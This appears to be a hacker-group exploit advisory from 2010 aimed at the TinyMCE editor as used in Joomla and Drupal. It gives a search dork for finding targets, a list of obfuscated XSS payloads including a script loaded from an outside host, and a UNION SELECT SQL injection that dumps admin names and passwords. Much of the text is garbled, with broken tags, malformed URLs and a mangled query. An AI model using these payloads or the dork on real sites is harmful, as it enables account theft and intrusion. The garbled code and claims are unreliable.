[+] Vurnerebility: *Js tiny_mce/tiny_mce WYSIWYG{java script} vurnerebility xss-->popup
*& SQl implemented
[+] Language : Java--,Xml
[+] lisences : LGPL
[+] Vendor : Moxiecode Systems AB
[+] support : IE7J0/IE6.0/NS8.1-IE/NS8.1-G/FF2.0/O9.02;
[+] Category : bug report
[+] vendor : http://tinymce.moxiecode.com/
[+] implemented : joomla componen,drupal..
[+] Author : mc2_s3lector //yogyacarderlink.web.id
[+] dork : powered:powered by CMS
: inurl"file_manager.php?type=img"
[+] Contact : (00x0---www.yogyacarderlink.web.id
[+]date : 4-2-10
[+] biGthank to : Allah,jasakom,KeDai Computerworks,all indonesian like a coding,
------------------------------------------------------------------------------------
--[Vulnerability sampling]--
-------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------
# alert(String.fromCharCode(X1,X2,X3,X4))//";alert(String.fromCharCode(X1,X2,X3,x4))//\";
alert(String.fromCharCode(X1,X2,X3,x4))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(X1,X2,X3,x4))</SCRIPT>
#
-------------------------------------------------------------------------------------------------------------------------
# '';!--"<XSS>=&{()}'
------------------------------------------------------------------------------------
<script SRC=http//:server.com/xss.js></put_SCRIPT>
<a hreef="http://www.server://www.server.com/server.com/">put_code</a>
<a href="http://www.server.com./">put_code</a>
<marquee>http://server.net">put_code</marquee>
<a href="//srver.net">put_code</A>
<a href="http://0x1x.01x0061.0x6/">put_code</a>
------------------------------------------------------------------------------------
[Thread img src]
"<img src=javascript:alert("XSS")>"
"<img src="javascript:alert('Put_script');"> [or] <IMG SRC=javascript:alert('put_Script')>"
"<IMG SRC=javascript:alert(String.fromCharCode(X1,X2,X3,X4))>"
"<img src=`javascript:alert("put_xss")`>"
"<IMG SRC="jav ascript:alert('XSS');">"
<IMG
SRC
=
"
write javascript vertikal position exmpl:
j
s
:
a
l
e
r
t
(
'
put code vertical position
'
)
)
;
>
"<IMG SRC=>"
try conversion---->use RainbowText from <IMG SRC=>
make compilign:
<font color="#ff0000"><</font><font color="#ff4200">I</font><font color="#ff8500">M</font><font color="#ffc700">G</font> <font color="#f3ff00">S</font><font color="#b1ff00">R</font><font color="#6eff00">C</font><font color="#2cff00">=</font><font color="#00ff16">&</font><font color="#00ff58">#</font><font color="#00ff9b">1</font><font color="#00ffdd">;</font><font color="#00ddff">&</font><font color="#009bff">#</font><font color="#0058ff">2</font><font color="#0016ff">;</font><font color="#2c00ff">&</font><font color="#6e00ff">#</font><font color="#b100ff">3</font><font color="#f300ff">;</font><font color="#ff00c7">&</font><font color="#ff0085">#</font><font color="#ff0042">3</font><font color="#ff0000">></font>
-------------------------------------------------------------------------------------------------------------------------------------------------------------
SQL implemented:Injection vulnerability---->installed on c-panel(joomla---sampling write tabel view/editor)
Exploit :server/patch/index.php?menuID=-value union select//**//users/2,3,4,5/password//**//from/2,3,4,5//,Group_CONCAT(name,CHAR(3,4,5),wachtwoord),2,3 from admin--
#########################################################################################################
# www.yogyacarderlink.web.id
